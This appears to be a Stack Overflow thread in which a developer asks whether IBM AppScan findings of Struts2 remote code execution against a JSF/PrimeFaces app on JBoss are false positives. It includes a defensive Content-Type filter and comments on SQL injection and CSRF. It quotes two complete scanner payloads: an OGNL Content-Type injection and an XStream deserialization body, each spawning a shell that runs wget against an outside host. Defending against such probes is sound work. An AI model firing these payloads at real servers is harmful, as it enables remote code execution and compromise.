
We recently received results from IBM AppScan DAST and some of the results didn't make sense. The first 2 High issues show the application as being Struts2, which is incorrect since it is JSF 2.2, Primefaces 7.0.9 running on JBoss EAP 7.2 (JSF version 2.3). I don't even see Struts in the JBoss modules / jars.

1. High -- Apache Struts2 Remote Code Execution

Risk(s): It is possible to run remote commands on the web server. This usually means complete compromise of the server and its contents.
Fix: Upgrade to the latest version of Apache Struts

GET /**/main.xhtml HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: %{(#_='multipart/formdata').(#
dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#conta
iner=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstanc
e(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#o
gnlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget
http://**:**/AppScanMsg.html?varId=5899').(#iswin=(@java.lang.System@getProperty('o
s.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#c
md})).(#p=new
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.
apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUt
ils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

Seems like the response is HTTP/1.1 200 OK, which AppScan believes is a vulnerability.

We were told we should check the Content-Type of the request header. I have not come across anything like this in any past DAST. Has anyone done something like this before in JSF?

1. High -- Apache Struts2 REST Plugin XStream Remote Code Execution

POST /**/javax.faces.resource/charts/charts.css.xhtml?ln=primefaces&v=7.0.9 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Win32)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Content-Type: application/xml
<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><value
class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"><dataHandler><dataSource
class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><is
class="javax.crypto.CipherInputStream"><cipher
class="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIterator
class="javax.imageio.spi.FilterIterator"><iter class="javax.imageio.spi.FilterIterator"><iter
class="java.util.Collections$EmptyIterator" /><next
class="java.lang.ProcessBuilder"><command><string>cmd.exe</string><string>/C</string><string>"wget
http://***:**/AppScanMsg.html?varId=6107"</string></command><redirectErrorStream>fal
se</redirectErrorStream></next></iter><filter
class="javax.imageio.ImageIO$ContainsFilter"><method><class>java.lang.ProcessBuilder</class><name>
start</name><parameter-types /></method><name>foo</name></filter><next
class="string">foo</next></serviceIterator><lock /></cipher><input
class="java.lang.ProcessBuilder$NullInputStream" /><ibuffer
/><done>false</done><ostart>0</ostart><ofinish>0</ofinish><closed>false</closed></is><consumed>fal
se</consumed></dataSource><transferFlavors
/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.objects.NativeString><jdk.nasho
rn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"
/></entry><entry><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString"
/><jdk.nashorn.internal.objects.NativeString
reference="../../entry/jdk.nashorn.internal.objects.NativeString" /></entry></map>

Seems like the response is HTTP/1.1 200 OK, which AppScan believes is a vulnerability.

Our web.xml has the error pages defined, and client-side state saving:

    <error-page>
        <error-code>404</error-code>
        <location>/error/404.xhtml</location>
    </error-page>
    <error-page>
        <error-code>500</error-code>
        <exception-type>java.lang.RuntimeException</exception-type>
        <location>/error/access.xhtml</location>
    </error-page>
    <error-page>
        <location>/error/error.xhtml</location>
    </error-page>

    <context-param>
        <param-name>javax.faces.STATE_SAVING_METHOD</param-name>
        <param-value>client</param-value>
    </context-param>

Has anyone seen a similar issue from DAST? Could some of these be false positives? Looking for feedback and some insight.

Other Issue

Link: CSRF, XSS and SQL Injection attack prevention in JSF
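As an added example (not code from the question or from the Primefaces/JBoss projects), a servlet Filter that performs the Content-Type check mentioned above for the JSF pages. It assumes all JSF pages and resources are served under *.xhtml, as in both probes, and that the JAX-RS/JAX-WS endpoints live elsewhere; it rejects the malformed header of the first probe and the XML body of the second before they reach JSF.

```java
import java.io.IOException;
import java.util.regex.Pattern;
import javax.servlet.Filter;
import javax.servlet.FilterChain;
import javax.servlet.ServletException;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

// Added example (not from the question, Primefaces or JBoss EAP). Assumes JSF pages
// and resources end in .xhtml, as in both probes, and JAX-RS/JAX-WS live elsewhere.
@WebFilter(urlPatterns = "*.xhtml")
public class XhtmlContentTypeFilter implements Filter {
    // RFC 7230 token chars; '{', '(', '=' and spaces are not among them, so an
    // OGNL-style "%{(#_='multipart/formdata')..." header can never match.
    private static final String TOKEN = "[!#$%&'*+.^_`|~0-9A-Za-z-]+";
    private static final String QUOTED = "\"(?:[^\"\\\\]|\\\\.)*\"";
    // RFC 7231 media-type: type "/" subtype *( OWS ";" OWS name "=" value )
    private static final Pattern MEDIA_TYPE = Pattern.compile(
        "^" + TOKEN + "/" + TOKEN
        + "(?:\\s*;\\s*" + TOKEN + "=(?:" + TOKEN + "|" + QUOTED + "))*\\s*$");

    // The only media types a JSF page legitimately receives in a POST (ViewState form posts, uploads).
    static boolean isJsfFormType(String contentType) {
        String base = contentType.split(";", 2)[0].trim().toLowerCase();
        return base.equals("application/x-www-form-urlencoded")
            || base.equals("multipart/form-data");
    }

    @Override
    public void doFilter(ServletRequest req, ServletResponse res, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest request = (HttpServletRequest) req;
        HttpServletResponse response = (HttpServletResponse) res;
        String contentType = request.getHeader("Content-Type");
        if (contentType != null && !MEDIA_TYPE.matcher(contentType).matches()) {
            // Not a media type at all (first probe): refuse instead of answering 200.
            response.sendError(HttpServletResponse.SC_BAD_REQUEST, "Malformed Content-Type");
            return;
        }
        if ("POST".equals(request.getMethod()) && contentType != null
                && !isJsfFormType(contentType)) {
            // application/xml posted to a JSF resource URL (second probe): 415.
            response.sendError(HttpServletResponse.SC_UNSUPPORTED_MEDIA_TYPE);
            return;
        }
        chain.doFilter(req, res);
    }
}
```

With this in place the scanner's OGNL probe gets a 400 and the XStream probe a 415 rather than the 200 it reports on; the actual confirmation that both findings are false positives remains that no Struts jar is deployed, which you can verify by listing the deployment's WEB-INF/lib and the JBoss modules directory.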

  • Penetration tests like this often (I think almost every time) come with problems, related test cases, and some suggestions for the resolution, basically with everything you need, so first, check what IBM recommends (the Fix: part). About Struts, since you use it for web services, check your version, whether it has known vulnerabilities, same for your application server. SQL injection seems clear to fix since IBM reports its test case. Same for Java Deserialization Code Execution, you're missing some escaping or a sanitizer of your input. Then you have to enable CSRF and solve the other two issues. – WoAiNii May 08 '20 at 06:59
  • So, basically for the first four, you need to sanitize every input you receive, else someone can run an arbitrary script directly on your server. Then you have to enable CSRF and add these two cookie parameters. But for every case, you have how to reproduce it and how to solve it, directly from IBM, so read that first. – WoAiNii May 08 '20 at 07:13
  • Apache Struts2 Remote Code Execution and Apache Struts2 REST Plugin XStream Remote Code Execution were a bit misleading. Thanks for the advice on web services since we do have JAX-RS and JAX-WS services. I tried to keep the above post compact but a lot of the HTTP responses were either session timeouts or ViewExpiredException, and since the view state was client-side the response was truncated in the report. – Ravi May 08 '20 at 12:12
  • W.r.t. Blind SQL Injection (Time Based), the analysis reports a note that "The first and third test responses were timed out and the second test response was received normally". This issue occurred in 3 instances; will update based on the scenario. – Ravi May 08 '20 at 12:59
  • Personally I'd say these test results are bogus... So much lack of clarity in the feedback and wrong info based (imo) on old assumptions (all IBM's fault, not yours). And all the issues are so different that they do not belong in one question imo. Hard to respond/reply/comment. – Kukeltje May 08 '20 at 13:38
  • @Kukeltje I have been racking my brains for a week to get at least one reproducible example that can prove a vulnerability exists in either JSF or Primefaces, or something that I can fix. Over 3000 pages of report with 80% of the report for the first 2 Struts issues. Not fun when the AppScan result needs to be clean for a go/no-go decision :( – Ravi May 08 '20 at 13:55
  • I tried to put a summary of the issues here since I was not even sure if all the above issues truly represented an actual vulnerability just because AppScan reported them, e.g. modifying the javax.faces.ViewState parameter, the javax.faces.source parameter, checking CSRF on javax.faces.resource. – Ravi May 08 '20 at 14:04
  • And I have not even put in the low issues, which are asking me to add "Cache-Control: no-store" and "Pragma: no-cache" to javax.faces.resource/components.css and others ¯\_(ツ)_/¯ – Ravi May 08 '20 at 14:07
  • Am I missing something? They seem rather clear (maybe based on old assumptions, but about some missing best practices), e.g. in SQL injection they refer to a specific field `form:propertyTree:0:j_idt126` and they said that they can use that to SQL inject your DB. It seems clear as an issue; how do you use that input in your query? Why do you say this isn't a vulnerability? As suggested, you could post single or related ones per question, else it is pretty hard to get an answer. – WoAiNii May 08 '20 at 15:11
  • @WoAiNii I edited and added a 2nd case for Blind SQL Injection (Time Based). In this case we do not use the param V. I am checking on the form:propertyTree:0:j_idt126 issue. – Ravi May 08 '20 at 15:22
  • Ok, now that you have the field, check/post how you use it in your query (what do you use, Hibernate/iBatis/other?). – WoAiNii May 08 '20 at 15:39
  • form:propertyTree:0:j_idt126, attached an image. We use our own framework. It internally generates JDBC queries using prepared statements for queries that run against the DB. – Ravi May 08 '20 at 16:00
  • [This](https://stackoverflow.com/questions/1812891/java-escape-string-to-prevent-sql-injection) could help for that. – WoAiNii May 08 '20 at 17:42
  • Yes, we are using 100% prepared statements. – Ravi May 08 '20 at 18:10
  • https://owasp.org/www-community/attacks/Blind_SQL_Injection - The specific issue is that AppScan marks it as a Time-based Blind SQL injection. The time-based type of blind SQL injection relies on the database pausing for a specified amount of time, then returning the results, indicating successful SQL query execution. Using this method, an attacker enumerates each letter of the desired piece of data using the following logic: If the first letter of the first database's name is an 'A', wait for 10 seconds. If the first letter of the first database's name is a 'B', wait for 10 seconds. etc. – Ravi May 08 '20 at 18:14
  • Let us [continue this discussion in chat](https://chat.stackoverflow.com/rooms/213444/discussion-between-woainii-and-ravi). – WoAiNii May 08 '20 at 19:14
  • Please split the question into multiple ones... focus... – Kukeltje May 09 '20 at 08:21
  • Is this serious: _"over 3000 pages of report with 80% of the report for the first 2 Struts issues"_? – Kukeltje May 09 '20 at 08:28
  • Yes.. including request and response dumps in PDF with a response that is partial. Will split this into multiple questions. – Ravi May 09 '20 at 11:56
  • @Kukeltje I have split this post into 4 more questions. I will update each of them with more details. Keep this post for the 2 Struts issues. – Ravi May 10 '20 at 00:50
